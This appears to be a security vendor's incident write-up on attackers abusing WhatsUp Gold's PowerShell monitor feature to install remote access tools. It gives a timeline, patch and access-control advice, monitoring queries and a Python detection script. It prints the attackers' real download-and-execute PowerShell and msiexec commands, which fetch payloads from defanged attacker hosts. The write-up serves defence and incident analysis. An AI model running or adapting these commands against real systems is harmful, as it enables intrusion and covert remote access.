Defending Against RCE Attacks Exploiting WhatsUp Gold Vulnerabilities

Discovery of Attacks in Trend Vision One

Initial infiltration

Monitoring in Trend Vision One revealed that an unfamiliar script fetched from a suspicious URL was executed on the system hosting WhatsUp Gold shortly after it was downloaded. Before the incident there were no signs of unauthorized logins, access to suspicious URLs, or malware deployment. These are the usual indicators of an early-stage attack, and their absence suggested that a vulnerability had been exploited instead.

The executable NmPoller.exe within WhatsUp Gold was found capable of executing an Active Monitor PowerShell Script as part of its intended functionality (See Figure 2). In this instance, threat actors exploited this feature for remote execution of arbitrary code.

The malicious code executed by NmPoller.exe had a specific format: the first lines were the prefix, while the last two lines contained the malicious code supplied by the threat actor. Multiple variations of this section have been identified, as demonstrated in Figure 3.

Action

Several PowerShell scripts were run through NmPoller.exe. The following scripts were executed as the malicious component, each combined with the prefix section outlined earlier:

(New-Object System.Net.WebClient).DownloadFile('hxxps://webhook[.]site/b6ef7410-9ec8-44f7-8cdf-7890c1cf5837','c:\programdata\a.ps1'); powershell -exec bypass -file c:\programdata\a.ps1

msiexec /i hxxp://45.227.255[.]216:29742/ddQCz2CkW8/setup.msi /Qn

msiexec /i hxxps://fedko[.]org/wp-includes/ID3/setup.msi /Qn

iwr -uri hxxps://fedko[.]org/wp-includes/ID3/setup.msi -outfile c:\windows\temp\MSsetup.msi ; msiexec /i c:\windows\temp\MSsetup.msi /Qn

The file a.ps1 contained only one line:

(New-Object System.Net.WebClient).DownloadFile('hxxp://185.123.100[.]160/access/Remote Access-windows64-offline.exe?language=en&app=61021689825303726412222891579678345108&hostname=hxxp://185.123.100[.]160','C:\programdata\ftpd32.exe');start-process C:\programdata\ftpd32.exe;

Persistence

The threat actor’s goal in this scenario was to introduce remote administration tools using PowerShell. They made efforts to deploy these four remote access tools (RATs) via msiexec.exe (See Figure 4):

  • Atera Agent
  • Radmin
  • SimpleHelp Remote Access
  • Splashtop Remote

The installation of Atera Agent and Splashtop Remote was carried out using a single MSI installer retrieved from the URL hxxps://fedko[.]org/wp-includes/ID3/setup.msi.

The MXDR team successfully contained the incident with no further repercussions. While the threat actor remains unidentified, their use of multiple RATs hints at a possible ransomware affiliation.

Identification of Vulnerability and Exploitation

Timeline of Events
  • August 16, 2024 – The vendor of the product released the latest patch along with the CVE identifiers
  • August 30, 2024 5pm (UTC) – The individual who discovered the vulnerability published the PoC on GitHub
  • August 30, 2024 10pm (UTC) – The Trend Micro MXDR team witnessed the initial incident exploiting the legitimate functionality of WhatsUp Gold

This sequence of events implies that exploitation began on the same day, only hours after the PoC was made public. Because the PoC was disclosed on the Friday before a long weekend in the US that included a public holiday, many organizations may have struggled to apply the patch promptly. Nevertheless, the patch had been released ahead of the PoC, which shows that applying patches proactively, especially for critical vulnerabilities, can limit the damage even before any PoC exists.

Censys has released an advisory revealing 1,207 exposed devices online for CVE-2024-4885, another vulnerability in WhatsUp Gold with a CVSS score of 9.8, which was rectified in June. This could have drawn threat actors’ attention as an exploitable surface following the disclosure of severe vulnerabilities in June.

Preventative Measures

The compromise of user authentication for WhatsUp Gold led to the incident on the affected host. Users of the product should implement the following measures to prevent a similar occurrence:

  • Install the most recent patch promptly. Official information on the product, such as release notes and security bulletins, can be accessed on the vendor’s website.
  • Secure the management console and API endpoints with access controls. Avoid exposing corporate tools to the public internet to prevent unauthorized access by malicious actors.
  • Utilize strong passwords. Note that even if all patches have been applied and you are unaffected by the vulnerability, a weak password (e.g., admin:admin) without access controls could still result in exploitation.

Monitoring

To detect the observed attacks, process creation events originating from the following process were monitored:

  • {Installed path for WhatsUp Gold}\nmpoller.exe

For instance, if C:\Program Files (x86)\Ipswitch\WhatsUp\nmpoller.exe spawns processes similar to the following, it should be treated as suspicious:

  • "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -file c:\programdata\a.ps1
  • "C:\Windows\system32\msiexec.exe" /i hxxps://fedko[.]org/wp-includes/ID3/setup.msi /Qn
  • "C:\Windows\system32\msiexec.exe" /i hxxp://45.227.255[.]216:29742/ddQCz2CkW8/setup.msi /Qn
  • "C:\Windows\system32\msiexec.exe" /i c:\windows\temp\MSsetup.msi /Qn
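As an added illustration of the process creation rule described above (example code written for this page, not part of the original write-up or any Trend Micro tool): a small Python detector that flags children of nmpoller.exe whose command lines match the observed powershell.exe and msiexec.exe patterns. The sample events are constructed from the command lines in the write-up; the ping.exe child is an assumed benign Active Monitor child, and the defanged hxxp/hxxps URLs are kept so nothing here resolves.

```python
import re
from typing import List, NamedTuple, Optional, Tuple

class ProcEvent(NamedTuple):  # Sysmon Event ID 1 style fields
    parent_image: str
    image: str
    command_line: str

# Constructed sample events mirroring the command lines in the write-up.
# Defanged hxxp/hxxps and [.] are kept so nothing here resolves.
WUG = r"C:\Program Files (x86)\Ipswitch\WhatsUp\nmpoller.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSI = r"C:\Windows\system32\msiexec.exe"
SAMPLE_EVENTS = [
    ProcEvent(WUG, PS, r"powershell.exe -exec bypass -file c:\programdata\a.ps1"),
    ProcEvent(WUG, MSI, r"msiexec.exe /i hxxps://fedko[.]org/wp-includes/ID3/setup.msi /Qn"),
    ProcEvent(WUG, MSI, r"msiexec.exe /i c:\windows\temp\MSsetup.msi /Qn"),
    ProcEvent(WUG, r"C:\Windows\System32\PING.EXE", "ping -n 1 10.0.0.5"),  # assumed benign
    ProcEvent(r"C:\Windows\explorer.exe", PS, r"powershell.exe -exec bypass -file c:\programdata\a.ps1"),
]

# Patterns derived from the observed attack; all matched case-insensitively.
PS_BYPASS = re.compile(r"-(exec|ep|executionpolicy)\s+bypass|-file\s", re.I)
MSI_REMOTE = re.compile(r"/i\s+(hxxps?|https?)://", re.I)
MSI_STAGED = re.compile(r"/i\s+\S*\\(windows\\temp|programdata)\\", re.I)

def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (tolerates forward slashes)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(ev: ProcEvent) -> Optional[str]:
    """Reason the event matches the attack pattern, or None if it does not."""
    if basename(ev.parent_image) != "nmpoller.exe":
        return None  # only children of the poller are in scope for this rule
    child = basename(ev.image)
    if child == "powershell.exe" and PS_BYPASS.search(ev.command_line):
        return "nmpoller.exe spawned powershell.exe with -exec bypass / -file"
    if child == "msiexec.exe" and MSI_REMOTE.search(ev.command_line):
        return "nmpoller.exe spawned msiexec.exe installing a remote MSI"
    if child == "msiexec.exe" and MSI_STAGED.search(ev.command_line):
        return "nmpoller.exe spawned msiexec.exe installing an MSI from a staging dir"
    return None

def suspicious_events(events: List[ProcEvent]) -> List[Tuple[str, str]]:
    """(command_line, reason) for every event the rule fires on."""
    return [(ev.command_line, r) for ev in events if (r := classify(ev))]

if __name__ == "__main__":
    for cmd, reason in suspicious_events(SAMPLE_EVENTS):
        print(f"ALERT: {reason}: {cmd}")
```

Regular children of nmpoller.exe in your environment (the page notes product restarts and daily log creation also show up) should be added as explicit exclusions rather than by loosening the patterns.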

Sample Query for Vision One Search App

  • Search method: Endpoint Activity Data
  • Query: "nmpoller.exe" AND eventSubId:(2 OR 101 OR 109 OR 901)
  • Monitoring recommendations:
    • Events such as product restarts or daily log file creation will also appear in the results; exclude the regular events specific to your environment.
    • Watch for unusual spikes in the number of events in the search results (See Figure 5).

Identified attack tactics (IAT) found using Vision One:

  • Installation of External MSI Package using Msiexec (High)
  • Installation of Questionable RAT (SimpleHelp) (Medium)
  • Installation of Suspicious RAT (AteraAgent) (Medium)
  • Creation of Suspicious RAT (Splashtop) File (Medium)
  • Presence of Malicious Software – PUA.Win32.RAdmin.E (Medium)

It is important to note that in this setup, NmPoller.exe can execute PowerShell scripts without starting a separate powershell.exe process, so process creation monitoring alone will not see every script. If PowerShell scripts can be monitored through the Antimalware Scan Interface (AMSI), verify that every script run by WhatsUp Gold's Active Monitor PowerShell Script feature is one you expect. To simplify monitoring, it is advisable to suspend use of the Active Monitor PowerShell Script feature until the latest update is applied.

Moreover, because CVE-2024-6670 is described as enabling user account compromise, attacks may surface as incidents that look different from the one described here. Until the latest update is in place, it is therefore recommended to tighten the access controls of WhatsUp Gold as far as possible and to monitor the events of all associated processes closely.

Summary

While patch management remains crucial, it is consistently a challenging endeavor. In this instance, the Proof of Concept (PoC) was published several days after the patch was released, and an incident apparently driven by the vulnerability was observed on the very day the PoC appeared, only a few hours after publication. This case underscores that when a fix for a severe vulnerability is available, applying the patch promptly upon release is strongly advised, even when no PoC exists yet.

Preventing incidents like this hinges not only on patch management but also on implementing various defensive strategies. Among the most prevalent defenses to mitigate risks are access control and multi-factor authentication (MFA), which security teams can implement using best practices such as:

  • Restricting access to hosts/services meant for corporate use rather than exposing them publicly
    • Avoid exposing the management consoles or API endpoints of products intended for corporate use to the public internet, so that they stay off threat actors' radar.
  • Enabling MFA for all network logins
    • To forestall account compromise, it is recommended to have MFA activated for all user accounts accessing the network, or logging into Windows, Linux, or web applications.
    • Additionally, ensure the utilization of robust passwords that have never been employed elsewhere.
  • Utilizing passkeys
    • Whenever feasible, opting for a passkey instead of a password is advisable.
    • Passkeys leverage a cryptographic key stored on the device for logins, activated by local authentication like users’ biometrics for unlocking the device. Since there’s no need for passwords or manual input, and hence no strings of characters involved, passkeys are resilient against phishing attacks.

Maintaining readiness and vigilance against cyber threats is crucial so that emergency responses are directed solely at genuine threats. As part of that preparation, security teams are encouraged to re-check that no unintended hosts or services are exposed to the public internet. This practice is now recognized as part of attack surface management.

Organizations may also explore robust security solutions such as Trend Vision One™, which provides layered protection and behavior monitoring to thwart malicious tools and services before causing harm to user systems and devices.
